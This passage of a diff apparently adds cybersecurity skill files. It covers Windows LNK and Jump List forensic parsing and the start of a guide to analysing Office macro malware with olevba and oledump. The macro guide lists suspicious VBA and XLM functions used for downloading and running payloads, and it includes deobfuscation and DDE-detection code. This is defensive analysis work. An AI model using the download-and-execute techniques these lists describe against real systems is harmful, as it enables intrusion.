- **Volume information**: Serial number, drive type, volume label
|
||||
- **Network share information**: UNC path, share name
|
||||
- **Machine identifiers**: NetBIOS name, MAC address (from TrackerDataBlock)
|
||||
- **Distributed Link Tracking**: Machine ID and object GUID
|
||||
|
||||
## Analysis with EZ Tools
|
||||
|
||||
### LECmd - LNK File Parser
|
||||
|
||||
```powershell
|
||||
# Parse all LNK files in Recent folder
|
||||
LECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent" --csv C:\Output --csvf lnk_analysis.csv
|
||||
|
||||
# Parse a single LNK file with full details
|
||||
LECmd.exe -f "C:\Evidence\Users\suspect\Desktop\Confidential.docx.lnk" --json C:\Output
|
||||
|
||||
# Process every file in the directory, not only those with a .lnk extension
|
||||
LECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent" --csv C:\Output --csvf lnk_all.csv --all
|
||||
```
|
||||
|
||||
### JLECmd - Jump List Parser
|
||||
|
||||
```powershell
|
||||
# Parse Automatic Jump Lists
|
||||
JLECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations" --csv C:\Output --csvf jumplists_auto.csv
|
||||
|
||||
# Parse Custom Jump Lists
|
||||
JLECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations" --csv C:\Output --csvf jumplists_custom.csv
|
||||
|
||||
# Parse all jump lists with detailed output
|
||||
JLECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations" --csv C:\Output --csvf jumplists_auto_detailed.csv --ld
|
||||
```
|
||||
|
||||
## Jump List Structure
|
||||
|
||||
### Automatic Destinations (automaticDestinations-ms)
|
||||
|
||||
These are OLE Compound files (Structured Storage) identified by AppID hash in the filename:
|
||||
|
||||
| AppID Hash | Application |
|
||||
|-----------|-------------|
|
||||
| 5f7b5f1e01b83767 | Windows Explorer Pinned/Frequent |
|
||||
| 1b4dd67f29cb1962 | Windows Explorer Recent |
|
||||
| 9b9cdc69c1c24e2b | Notepad |
|
||||
| a7bd71699cd38d1c | Notepad++ |
|
||||
| 12dc1ea8e34b5a6 | Microsoft Paint |
|
||||
| 7e4dca80246863e3 | Control Panel |
|
||||
| 1cf97c38a5881255 | Microsoft Edge |
|
||||
| f01b4d95cf55d32a | Windows Explorer |
|
||||
| 9d1f905ce5044aee | Microsoft Excel |
|
||||
| a4a5324453625195 | Microsoft Word |
|
||||
| d00655d2aa12ff6d | Microsoft PowerPoint |
|
||||
| bc03160ee1a59fc1 | Outlook |
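
Because the AppID is simply the filename stem, mapping a collected Jump List file to its application can be sketched in a few lines. The lookup below copies a few rows from the table above; `identify_jump_list` is a hypothetical helper, and any AppID missing from the dictionary is reported as unknown rather than guessed.

```python
from pathlib import PureWindowsPath

# Subset of the AppID table above
KNOWN_APP_IDS = {
    "5f7b5f1e01b83767": "Windows Explorer Pinned/Frequent",
    "9b9cdc69c1c24e2b": "Notepad",
    "9d1f905ce5044aee": "Microsoft Excel",
    "a4a5324453625195": "Microsoft Word",
    "d00655d2aa12ff6d": "Microsoft PowerPoint",
}


def identify_jump_list(filename: str) -> dict:
    """Split a Jump List filename into AppID and type, then look up the application."""
    name = PureWindowsPath(filename).name
    app_id, _, extension = name.partition(".")
    kinds = {"automaticdestinations-ms": "automatic", "customdestinations-ms": "custom"}
    return {
        "app_id": app_id.lower(),
        "type": kinds.get(extension.lower(), "unknown"),
        "application": KNOWN_APP_IDS.get(app_id.lower(), "Unknown"),
    }
```

`PureWindowsPath` is used so the function behaves the same on a Linux analysis workstation handling Windows-style evidence paths.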
|
||||
|
||||
### Custom Destinations (customDestinations-ms)
|
||||
|
||||
Created when users pin items to application jump lists. These files contain sequential LNK entries.
|
||||
|
||||
## Python Analysis Script
|
||||
|
||||
```python
|
||||
import struct
from datetime import datetime, timedelta
from typing import Optional

FILETIME_EPOCH = datetime(1601, 1, 1)


def filetime_to_datetime(filetime_bytes: bytes) -> Optional[datetime]:
    """Convert Windows FILETIME (100-ns intervals since 1601, UTC) to datetime."""
    ft = struct.unpack("<Q", filetime_bytes)[0]
    if ft == 0:
        return None  # a zero FILETIME means the timestamp is not set
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_lnk_header(lnk_path: str) -> dict:
    """Parse the Shell Link header from an LNK file."""
    with open(lnk_path, "rb") as f:
        header = f.read(76)

    # Reject truncated files before unpacking fixed-offset fields
    if len(header) < 76:
        return {"error": "Invalid LNK header"}

    header_size = struct.unpack("<I", header[0:4])[0]
    if header_size != 0x4C:
        return {"error": "Invalid LNK header"}

    link_flags = struct.unpack("<I", header[0x14:0x18])[0]
    file_attrs = struct.unpack("<I", header[0x18:0x1C])[0]

    result = {
        "header_size": header_size,
        "link_flags": hex(link_flags),
        "file_attributes": hex(file_attrs),
        "creation_time": filetime_to_datetime(header[0x1C:0x24]),
        "access_time": filetime_to_datetime(header[0x24:0x2C]),
        "write_time": filetime_to_datetime(header[0x2C:0x34]),
        "file_size": struct.unpack("<I", header[0x34:0x38])[0],
        # LinkFlags bits indicate which optional structures follow the header
        "has_target_id_list": bool(link_flags & 0x01),
        "has_link_info": bool(link_flags & 0x02),
        "has_name": bool(link_flags & 0x04),
        "has_relative_path": bool(link_flags & 0x08),
        "has_working_dir": bool(link_flags & 0x10),
        "has_arguments": bool(link_flags & 0x20),
        "has_icon_location": bool(link_flags & 0x40),
    }
    return result
|
||||
```
|
||||
|
||||
## Investigation Use Cases
|
||||
|
||||
### Evidence of File Access
|
||||
1. Parse LNK files from Recent folder to identify accessed documents
|
||||
2. Cross-reference with MFT timestamps and USN Journal entries
|
||||
3. Note that LNK files persist even after target files are deleted
|
||||
|
||||
### Removable Media Access
|
||||
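1. LNK files referencing drive letters such as E:, F:, or G: suggest removable media usage; the DriveType field in the LNK volume information (DRIVE_REMOVABLE) confirms it
2. Volume serial number in LNK identifies the specific volume (it changes if the device is reformatted)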
|
||||
3. MAC address in TrackerDataBlock identifies the source machine
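
The MAC address mentioned above is not stored as a separate field: it is the node portion of the version 1 GUID held in the TrackerDataBlock's Droid file identifier. A minimal sketch of extracting it is shown below, assuming the caller has already located the 96-byte block (signature 0xA0000003) in the LNK extra data; `parse_tracker_block` is a hypothetical helper.

```python
import struct
import uuid

TRACKER_SIGNATURE = 0xA0000003
TRACKER_SIZE = 0x60


def parse_tracker_block(block: bytes) -> dict:
    """Extract the NetBIOS name and, when available, the MAC from a TrackerDataBlock."""
    if len(block) < TRACKER_SIZE:
        raise ValueError("TrackerDataBlock is truncated")
    size, signature = struct.unpack_from("<II", block, 0)
    if size != TRACKER_SIZE or signature != TRACKER_SIGNATURE:
        raise ValueError("not a TrackerDataBlock")
    # MachineID: 16-byte NUL-padded NetBIOS name at offset 16
    machine_id = block[16:32].split(b"\x00", 1)[0].decode("ascii", errors="replace")
    # Droid: volume GUID at offset 32, file (object) GUID at offset 48
    object_id = uuid.UUID(bytes_le=block[48:64])
    mac = None
    if object_id.version == 1:  # only time-based GUIDs embed a node value
        mac = ":".join(f"{b:02x}" for b in object_id.node.to_bytes(6, "big"))
    return {"machine_id": machine_id, "object_id": str(object_id), "mac": mac}
```

The node value is only a genuine hardware address when the generating system used one; a node with the multicast bit set was randomly generated, so the result is best corroborated against other sources before being attributed to a machine.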
|
||||
|
||||
### Network Share Activity
|
||||
1. LNK files with UNC paths (\\server\share) indicate network file access
|
||||
2. NetBIOS name identifies the remote server
|
||||
3. Timestamps establish when access occurred
|
||||
|
||||
## Differences Between Windows 10 and Windows 11
|
||||
|
||||
Recent research (IEEE 2025) shows that Windows 11 produces different LNK and Jump List artifacts:
|
||||
- Fewer automatic LNK files generated for certain file types
|
||||
- Modified Jump List behavior for modern applications
|
||||
- UWP/MSIX applications may not generate traditional Jump Lists
|
||||
- Windows 11 Quick Access replaces some Recent functionality
|
||||
|
||||
## References
|
||||
|
||||
- Shell Link Binary File Format: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/
|
||||
- Magnet Forensics LNK Analysis: https://www.magnetforensics.com/blog/forensic-analysis-of-lnk-files/
|
||||
- Jump Lists Forensics 2025: https://www.cybertriage.com/blog/jump-list-forensics-2025/
|
||||
- Eric Zimmerman's LECmd/JLECmd: https://ericzimmerman.github.io/
|
||||
@@ -0,0 +1,26 @@
|
||||
# LNK File and Jump List Analysis Report
|
||||
|
||||
## Case Information
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Case Number | |
|
||||
| Examiner | |
|
||||
| Evidence Source | |
|
||||
|
||||
## LNK File Summary
|
||||
| LNK File | Target Path | Target Created | Target Modified | Volume Serial | Machine ID |
|
||||
|----------|-------------|----------------|-----------------|---------------|-----------|
|
||||
| | | | | | |
|
||||
|
||||
## Jump List Summary
|
||||
| Application | AppID | Files Accessed | Date Range |
|
||||
|------------|-------|---------------|------------|
|
||||
| | | | |
|
||||
|
||||
## Removable Media References
|
||||
| Drive Letter | Volume Serial | Volume Label | Files Accessed |
|
||||
|-------------|--------------|-------------|---------------|
|
||||
| | | | |
|
||||
|
||||
## Findings
|
||||
_(Summary of user activity established through LNK/Jump List analysis)_
|
||||
@@ -0,0 +1,22 @@
|
||||
# Standards - LNK File and Jump List Forensics
|
||||
|
||||
## Standards
|
||||
- MS-SHLLINK: Shell Link Binary File Format (Microsoft Open Specifications)
|
||||
- NIST SP 800-86: Guide to Integrating Forensic Techniques
|
||||
- SWGDE Best Practices for Computer Forensics
|
||||
|
||||
## Tools
|
||||
- LECmd (Eric Zimmerman): LNK file parser
|
||||
- JLECmd (Eric Zimmerman): Jump List parser
|
||||
- LnkParse3 (Python): Cross-platform LNK parser
|
||||
- Magnet AXIOM: Commercial forensic tool with LNK/Jump List support
|
||||
|
||||
## Key Artifact Locations
|
||||
- Recent files: %APPDATA%\Microsoft\Windows\Recent\
|
||||
- AutomaticDestinations: %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\
|
||||
- CustomDestinations: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\
|
||||
- Office Recent: %APPDATA%\Microsoft\Office\Recent\
|
||||
|
||||
## MITRE ATT&CK Mappings
|
||||
- T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification
|
||||
- T1204.002 - User Execution: Malicious File
|
||||
@@ -0,0 +1,44 @@
|
||||
# Workflows - LNK and Jump List Analysis
|
||||
|
||||
## Workflow 1: User File Access Investigation
|
||||
```
|
||||
Collect LNK files from Recent directory
|
||||
|
|
||||
Parse with LECmd to CSV
|
||||
|
|
||||
Filter by target path for specific files/locations
|
||||
|
|
||||
Extract timestamps, volume serial, NetBIOS name
|
||||
|
|
||||
Correlate with MFT and Event Log timestamps
|
||||
|
|
||||
Document file access timeline
|
||||
```
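
The last two steps of this workflow can be sketched in Python. This is a minimal illustration rather than part of the skill's tooling: it assumes records shaped like the output of `parse_lnk_file` in `scripts/process.py` (keys `file`, `creation_time`, `access_time`, `write_time`, with timestamps rendered by `str(datetime)` or the literal string `None`), and `build_timeline` is a hypothetical helper name.

```python
from datetime import datetime

TIME_FIELDS = ("creation_time", "access_time", "write_time")


def build_timeline(records):
    """Flatten per-file timestamps into one chronologically sorted event list."""
    events = []
    for rec in records:
        for field in TIME_FIELDS:
            raw = rec.get(field)
            if not raw or raw == "None":  # header timestamp was zero or absent
                continue
            try:
                when = datetime.fromisoformat(raw)
            except ValueError:
                continue  # skip values that are not ISO-like timestamps
            events.append((when, field, rec.get("file", "")))
    # Tuples sort by timestamp first, then field name, then file path
    return sorted(events)
```

Each event is a `(timestamp, field, lnk_file)` tuple, which makes it straightforward to merge with MFT or Event Log rows that carry their own timestamps.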
|
||||
|
||||
## Workflow 2: Jump List Application Activity
|
||||
```
|
||||
Collect AutomaticDestinations and CustomDestinations
|
||||
|
|
||||
Parse with JLECmd to CSV
|
||||
|
|
||||
Map AppID hashes to applications
|
||||
|
|
||||
Extract embedded LNK entries per application
|
||||
|
|
||||
Build per-application file access timeline
|
||||
|
|
||||
Identify removable media and network paths
|
||||
```
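
The AppID mapping step can be sketched as follows. Jump List files are named after the AppID (`<AppID>.automaticDestinations-ms` or `<AppID>.customDestinations-ms`), so the identifier can be read from the file name. The lookup table is supplied by the caller; the entry used in the usage note is a made-up placeholder, not a real AppID, and `identify_jump_list` is a hypothetical helper name.

```python
import re
from pathlib import PureWindowsPath

# AppID (hex) followed by the Jump List type suffix
JUMPLIST_NAME = re.compile(
    r"^(?P<appid>[0-9a-f]{1,16})\.(?P<kind>automatic|custom)Destinations-ms$",
    re.IGNORECASE,
)


def identify_jump_list(path, known_apps):
    """Return (appid, kind, application) for a Jump List file, or None."""
    name = PureWindowsPath(path).name
    match = JUMPLIST_NAME.match(name)
    if match is None:
        return None  # not a Jump List file name
    appid = match.group("appid").lower()
    kind = match.group("kind").lower()
    return appid, kind, known_apps.get(appid, "unknown")
```

For example, `identify_jump_list("0123456789abcdef.automaticDestinations-ms", {"0123456789abcdef": "Example Editor"})` resolves the placeholder AppID to the placeholder application name. In practice the table would come from a maintained AppID list.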
|
||||
|
||||
## Workflow 3: Removable Media Usage
|
||||
```
|
||||
Filter LNK files for drive letters (E:, F:, G:)
|
||||
|
|
||||
Extract volume serial numbers
|
||||
|
|
||||
Match with SYSTEM registry USBSTOR entries
|
||||
|
|
||||
Identify specific USB devices accessed
|
||||
|
|
||||
Build user-device-file timeline
|
||||
```
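
The first two steps of this workflow can be sketched as a grouping pass over parsed LNK records. The record keys `target_path` and `volume_serial` are assumptions for illustration (for example, columns taken from a parser's CSV export), and `group_by_volume` is a hypothetical helper.

```python
import ntpath
from collections import defaultdict


def group_by_volume(records, system_drive="C:"):
    """Group LNK targets on non-system drive letters by volume serial."""
    volumes = defaultdict(list)
    for rec in records:
        target = rec.get("target_path", "")
        drive, _ = ntpath.splitdrive(target)
        # Keep only drive-letter paths such as "E:"; UNC shares and the
        # system drive are skipped
        is_letter = len(drive) == 2 and drive[1] == ":"
        if is_letter and drive.upper() != system_drive.upper():
            key = (drive.upper(), rec.get("volume_serial", ""))
            volumes[key].append(target)
    return dict(volumes)
```

Each `(drive letter, volume serial)` key can then be compared with the device information recovered from the registry.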
|
||||
@@ -0,0 +1,108 @@
|
||||
#!/usr/bin/env python3
"""
LNK File and Jump List Forensic Analyzer

Parses LNK file headers (ShellLinkHeader) and extracts forensic metadata:
target timestamps, target file size, link flags, and file attributes.
"""

import struct
import os
import sys
import json
from datetime import datetime, timedelta


FILETIME_EPOCH = datetime(1601, 1, 1)


def filetime_to_datetime(ft_bytes: bytes):
    """Convert Windows FILETIME to datetime."""
    # FILETIME counts 100-nanosecond intervals since 1601-01-01 (UTC)
    ft = struct.unpack("<Q", ft_bytes)[0]
    if ft == 0:
        return None
    try:
        return FILETIME_EPOCH + timedelta(microseconds=ft // 10)
    except (OverflowError, OSError):
        return None


def parse_lnk_file(filepath: str) -> dict:
    """Parse a Windows LNK file and extract forensic metadata."""
    with open(filepath, "rb") as f:
        data = f.read()

    # The fixed-size ShellLinkHeader is 0x4C (76) bytes long
    if len(data) < 76:
        return {"file": filepath, "error": "File too small for LNK header"}

    header_size = struct.unpack("<I", data[0:4])[0]
    if header_size != 0x4C:
        return {"file": filepath, "error": "Invalid LNK header signature"}

    link_flags = struct.unpack("<I", data[0x14:0x18])[0]
    file_attrs = struct.unpack("<I", data[0x18:0x1C])[0]

    result = {
        "file": filepath,
        "file_size_lnk": len(data),
        # Timestamps describe the link target as recorded in the header
        "creation_time": str(filetime_to_datetime(data[0x1C:0x24])),
        "access_time": str(filetime_to_datetime(data[0x24:0x2C])),
        "write_time": str(filetime_to_datetime(data[0x2C:0x34])),
        "target_file_size": struct.unpack("<I", data[0x34:0x38])[0],
        "flags": {
            "has_target_id_list": bool(link_flags & 0x01),
            "has_link_info": bool(link_flags & 0x02),
            "has_name": bool(link_flags & 0x04),
            "has_relative_path": bool(link_flags & 0x08),
            "has_working_dir": bool(link_flags & 0x10),
            "has_arguments": bool(link_flags & 0x20),
            "has_icon_location": bool(link_flags & 0x40),
        },
        "attributes": {
            "readonly": bool(file_attrs & 0x01),
            "hidden": bool(file_attrs & 0x02),
            "system": bool(file_attrs & 0x04),
            "directory": bool(file_attrs & 0x10),
            "archive": bool(file_attrs & 0x20),
        }
    }
    return result


def scan_directory(lnk_dir: str, output_dir: str) -> str:
    """Scan a directory for LNK files and generate analysis report."""
    os.makedirs(output_dir, exist_ok=True)
    results = []

    for root, dirs, files in os.walk(lnk_dir):
        for fname in files:
            if fname.lower().endswith(".lnk"):
                filepath = os.path.join(root, fname)
                parsed = parse_lnk_file(filepath)
                results.append(parsed)

    report_path = os.path.join(output_dir, "lnk_analysis_report.json")
    with open(report_path, "w") as f:
        json.dump({
            "analysis_timestamp": datetime.now().isoformat(),
            "source_directory": lnk_dir,
            "total_lnk_files": len(results),
            "files": results
        }, f, indent=2, default=str)

    print(f"[*] Analyzed {len(results)} LNK files")
    print(f"[*] Report: {report_path}")
    return report_path


def main():
    if len(sys.argv) < 3:
        print("Usage: python process.py <lnk_directory> <output_dir>")
        sys.exit(1)
    scan_directory(sys.argv[1], sys.argv[2])


if __name__ == "__main__":
    main()
|
||||
@@ -0,0 +1,320 @@
|
||||
---
|
||||
name: analyzing-macro-malware-in-office-documents
|
||||
description: >
|
||||
Analyzes malicious VBA macros embedded in Microsoft Office documents (Word, Excel, PowerPoint)
|
||||
to identify download cradles, payload execution, persistence mechanisms, and anti-analysis
|
||||
techniques. Uses olevba, oledump, and VBA deobfuscation to extract the attack chain.
|
||||
Activates for requests involving Office macro analysis, VBA malware investigation,
|
||||
maldoc analysis, or document-based threat examination.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, macro, Office, VBA, document-malware]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Macro Malware in Office Documents
|
||||
|
||||
## When to Use
|
||||
|
||||
- A suspicious Office document (.doc, .docm, .xls, .xlsm, .ppt) has been flagged by email security
|
||||
- Investigating phishing campaigns that deliver weaponized Office documents
|
||||
- Extracting VBA macro code to identify the payload download URL and execution method
|
||||
- Analyzing obfuscated VBA code to understand the full attack chain
|
||||
- Determining if a document uses DDE, ActiveX, or remote template injection instead of macros
|
||||
|
||||
**Do not use** as the only method for in-depth analysis of non-macro Office threats (DDE, remote template injection); this skill covers detecting them, but specialized analysis may be needed.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.8+ with oletools installed (`pip install oletools`)
|
||||
- oledump.py from Didier Stevens (https://blog.didierstevens.com/programs/oledump-py/)
|
||||
- Isolated analysis VM without Microsoft Office installed (prevents accidental execution)
|
||||
- XLMDeobfuscator for Excel 4.0 macro analysis (`pip install XLMMacroDeobfuscator`)
|
||||
- LibreOffice for safe document rendering (does not execute VBA macros by default)
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Initial Document Triage
|
||||
|
||||
Determine if the document contains macros or other active content:
|
||||
|
||||
```bash
|
||||
# Quick triage with olevba
|
||||
olevba suspect.docm
|
||||
|
||||
# Check for OLE streams and macros
|
||||
oleid suspect.docm
|
||||
|
||||
# Output indicators:
|
||||
# VBA Macros: True/False
|
||||
# XLM Macros: True/False
|
||||
# External Relationships: True/False (remote template)
|
||||
# ObjectPool: True/False (embedded objects)
|
||||
# Flash: True/False (SWF objects)
|
||||
|
||||
# Comprehensive OLE analysis
|
||||
oledump.py suspect.docm
|
||||
|
||||
# List all OLE streams with macro indicators
|
||||
# Streams marked with 'M' contain VBA macros
|
||||
# Streams marked with 'm' contain only VBA attribute statements (no code)
|
||||
```
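
Before running the tools above, it can help to confirm what kind of container the file really is, since extensions are easily spoofed. The following is a minimal standard-library sketch, not a replacement for `oleid`: it checks the OLE2 and ZIP signatures and, for ZIP-based (OOXML) files, looks for an embedded `vbaProject.bin`. The function name and return shape are assumptions made for illustration.

```python
import io
import zipfile

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # OLE2 compound file signature


def triage_container(data):
    """Classify raw document bytes and flag an embedded VBA project."""
    if data.startswith(OLE_MAGIC):
        # Legacy .doc/.xls/.ppt: macros live in OLE streams (use olevba/oledump)
        return {"container": "ole2", "vba_project": None}
    if data.startswith(b"PK\x03\x04"):
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as z:
                names = z.namelist()
        except zipfile.BadZipFile:
            return {"container": "zip-corrupt", "vba_project": None}
        # OOXML stores the VBA project as <app>/vbaProject.bin
        has_vba = any(n.lower().endswith("vbaproject.bin") for n in names)
        return {"container": "ooxml-or-zip", "vba_project": has_vba}
    return {"container": "unknown", "vba_project": None}
```

A `vba_project` value of `None` means the check does not apply to that container type, not that macros are absent.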
|
||||
|
||||
### Step 2: Extract and Analyze VBA Code
|
||||
|
||||
Pull out the complete VBA macro source:
|
||||
|
||||
```bash
|
||||
# Extract VBA with full deobfuscation
|
||||
olevba --decode --deobf suspect.docm
|
||||
|
||||
# Extract just the VBA source code
|
||||
olevba --code suspect.docm > extracted_vba.txt
|
||||
|
||||
# Detailed extraction with oledump
|
||||
oledump.py -s 8 -v suspect.docm # Stream 8 (adjust based on stream listing)
|
||||
|
||||
# Flag Declare and CreateObject statements across macro streams
|
||||
oledump.py -p plugin_vba_dco suspect.docm
|
||||
```
|
||||
|
||||
```
|
||||
Key VBA Elements to Identify:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
Auto-Execution Triggers:
|
||||
- AutoOpen (Word) / Auto_Open (Excel)
|
||||
- Auto_Close / AutoClose
|
||||
- Document_Open / Document_Close
|
||||
- Workbook_Open (Excel)
|
||||
- AutoExec
|
||||
|
||||
Suspicious Functions:
|
||||
- Shell() / Shell.Application
|
||||
- WScript.Shell.Run / Exec
|
||||
- CreateObject("WScript.Shell")
|
||||
- PowerShell execution
|
||||
- URLDownloadToFile
|
||||
- MSXML2.XMLHTTP (HTTP requests)
|
||||
- ADODB.Stream (file writing)
|
||||
- Environ() (environment variables)
|
||||
- CallByName (indirect method calls)
|
||||
```
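
The checklist above can be turned into a quick first-pass scan over extracted VBA source. This is a sketch under simple assumptions: it does whole-word, case-insensitive matching only and will miss obfuscated names, so it complements the keyword analysis that `olevba` already performs rather than replacing it. `scan_vba` is a hypothetical helper.

```python
import re

AUTO_EXEC = ["Auto_Open", "AutoOpen", "Auto_Close", "AutoClose",
             "Document_Open", "Document_Close", "Workbook_Open", "AutoExec"]
SUSPICIOUS = ["Shell", "WScript.Shell", "CreateObject", "PowerShell",
              "URLDownloadToFile", "MSXML2.XMLHTTP", "ADODB.Stream",
              "Environ", "CallByName"]


def scan_vba(source):
    """Return the auto-exec triggers and suspicious keywords found in VBA text."""
    def hits(words):
        found = []
        for word in words:
            # Not preceded by a word character or dot, not followed by a word
            # character, so "Shell" does not match inside "WScript.Shell"
            pattern = r"(?<![\w.])" + re.escape(word) + r"(?!\w)"
            if re.search(pattern, source, re.IGNORECASE):
                found.append(word)
        return found
    return {"auto_exec": hits(AUTO_EXEC), "suspicious": hits(SUSPICIOUS)}
```

Running it on `extracted_vba.txt` gives a short list of entry points and API names to start tracing from.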
|
||||
|
||||
### Step 3: Deobfuscate VBA Code
|
||||
|
||||
Remove obfuscation layers to reveal the payload:
|
||||
|
||||
```python
|
||||
# VBA deobfuscation techniques
import re


def deobfuscate_vba(code):
    # 1. Resolve Chr()/ChrW() calls to quoted characters so that step 2 can
    #    merge them: Chr(104) & Chr(116) -> "h" & "t" -> "ht"
    def resolve_chr(match):
        try:
            char = chr(int(match.group(1)))
        except (ValueError, OverflowError):
            return match.group(0)  # leave out-of-range codes untouched
        # VBA escapes a double quote inside a string literal by doubling it
        return '"' + char.replace('"', '""') + '"'
    code = re.sub(r'\bChrW?\$?\((\d+)\)', resolve_chr, code, flags=re.IGNORECASE)

    # 2. Remove string concatenation: "htt" & "p://" -> "http://"
    code = re.sub(r'"\s*&\s*"', '', code)

    # 3. Resolve StrReverse: StrReverse("exe.daolnwod") -> "download.exe"
    def resolve_reverse(match):
        return '"' + match.group(1)[::-1] + '"'
    code = re.sub(r'StrReverse\("([^"]+)"\)', resolve_reverse, code, flags=re.IGNORECASE)

    # 4. Mid$/Left$/Right$ obfuscation is not handled here (complex, mark for manual review)

    # 5. Resolve Replace(): Replace("Powxershxell", "x", "") -> "Powershell"
    def resolve_replace(match):
        original = match.group(1)
        find = match.group(2)
        replace_with = match.group(3)
        return '"' + original.replace(find, replace_with) + '"'
    code = re.sub(r'Replace\("([^"]+)",\s*"([^"]+)",\s*"([^"]*)"\)', resolve_replace, code, flags=re.IGNORECASE)

    return code


with open("extracted_vba.txt") as f:
    vba_code = f.read()

deobfuscated = deobfuscate_vba(vba_code)
print(deobfuscated)
|
||||
```
|
||||
|
||||
### Step 4: Analyze Excel 4.0 (XLM) Macros
|
||||
|
||||
Handle legacy Excel macros that bypass VBA detection:
|
||||
|
||||
```bash
|
||||
# Detect XLM macros (recent olevba releases extract Excel 4.0 macros by default)
olevba suspect.xlsm
|
||||
|
||||
# Deobfuscate XLM macros
|
||||
xlmdeobfuscator -f suspect.xlsm
|
||||
|
||||
# Manual XLM analysis with oledump
|
||||
oledump.py suspect.xlsm -p plugin_biff.py
|
||||
|
||||
# XLM (Excel 4.0) macro functions to watch for:
|
||||
# EXEC() - Execute shell command
|
||||
# CALL() - Call DLL function
|
||||
# REGISTER() - Register DLL function
|
||||
# URLDownloadToFileA - Download file
|
||||
# ALERT() - Display message (social engineering)
|
||||
# HALT() - Stop execution
|
||||
# GOTO() - Control flow
|
||||
# IF() - Conditional execution
|
||||
```
|
||||
|
||||
### Step 5: Check for Non-Macro Attack Vectors
|
||||
|
||||
Examine the document for DDE, remote templates, and embedded objects:
|
||||
|
||||
```bash
|
||||
# Check for DDE (Dynamic Data Exchange)
|
||||
python3 -c "
|
||||
import zipfile
|
||||
import xml.etree.ElementTree as ET
|
||||
import re
|
||||
|
||||
z = zipfile.ZipFile('suspect.docx')
|
||||
for name in z.namelist():
|
||||
if name.endswith('.xml') or name.endswith('.rels'):
|
||||
content = z.read(name).decode('utf-8', errors='ignore')
|
||||
# DDE field codes
|
||||
if 'DDEAUTO' in content or 'DDE ' in content:
|
||||
print(f'[!] DDE found in {name}')
|
||||
dde_match = re.findall(r'DDEAUTO[^\"]*\"([^\"]+)\"', content)
|
||||
for m in dde_match:
|
||||
print(f' Command: {m}')
|
||||
# Remote template
|
||||
if 'attachedTemplate' in content or 'Target=' in content:
|
||||
urls = re.findall(r'Target=\"(https?://[^\"]+)\"', content)
|
||||
for url in urls:
|
||||
print(f'[!] Remote template URL: {url}')
|
||||
"
|
||||
|
||||
# Check for embedded OLE objects
|
||||
oleobj suspect.docm
|
||||
|
||||
# Check relationships for external references
|
||||
python3 -c "
|
||||
import zipfile
|
||||
z = zipfile.ZipFile('suspect.docx')
|
||||
for name in z.namelist():
|
||||
if '.rels' in name:
|
||||
content = z.read(name).decode('utf-8', errors='ignore')
|
||||
if 'http' in content.lower() or 'ftp' in content.lower():
|
||||
print(f'External reference in {name}:')
|
||||
import re
|
||||
urls = re.findall(r'Target=\"([^\"]+)\"', content)
|
||||
for url in urls:
|
||||
print(f' {url}')
|
||||
"
|
||||
```
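
The relationship check above can also be done by parsing the `.rels` parts as XML instead of matching strings, which makes it possible to report only targets marked `TargetMode="External"` together with their relationship type (for example `attachedTemplate`). This is a minimal sketch; `external_relationships` is a hypothetical helper that takes the document bytes.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_relationships(docx_bytes):
    """List (part, relationship type suffix, target) for external targets."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(z.read(name))
            except ET.ParseError:
                continue  # malformed part: leave for manual review
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    # Keep only the last path segment of the Type URI
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel_type, rel.get("Target", "")))
    return found
```

An `attachedTemplate` entry with an `http(s)` target is the typical remote template injection indicator, while `hyperlink` entries are usually ordinary links. For untrusted samples, a hardened XML parser such as the third-party `defusedxml` package may be preferable to the standard library parser.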
|
||||
|
||||
### Step 6: Generate Analysis Report
|
||||
|
||||
Document the complete macro malware analysis:
|
||||
|
||||
```
|
||||
Report should include:
|
||||
- Document metadata (author, creation date, modification date)
|
||||
- Macro presence and type (VBA, XLM, DDE, remote template)
|
||||
- Auto-execution trigger identified
|
||||
- Deobfuscated VBA source code (key functions)
|
||||
- Download URL(s) for second-stage payloads
|
||||
- Execution method (Shell, WScript, PowerShell, COM object)
|
||||
- Social engineering lure description
|
||||
- Extracted IOCs (URLs, domains, IPs, file hashes)
|
||||
- YARA rule for the specific document pattern
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|------|------------|
| **VBA Macro** | Visual Basic for Applications code embedded in Office documents that can interact with the OS, download files, and execute commands |
| **AutoOpen / Auto_Open** | Macro names that run automatically when a document is opened (`AutoOpen` in Word, `Auto_Open` in Excel); together with `Document_Open` and `Workbook_Open`, the primary triggers for macro malware |
| **OLE (Object Linking and Embedding)** | Microsoft compound document format; legacy Office documents (.doc, .xls, .ppt) are OLE containers with streams that can contain macros and objects, and OOXML documents store their VBA project in an embedded OLE file (`vbaProject.bin`) |
| **DDE (Dynamic Data Exchange)** | Legacy Windows IPC mechanism abused in documents to execute commands without macros; triggered by field code updates |
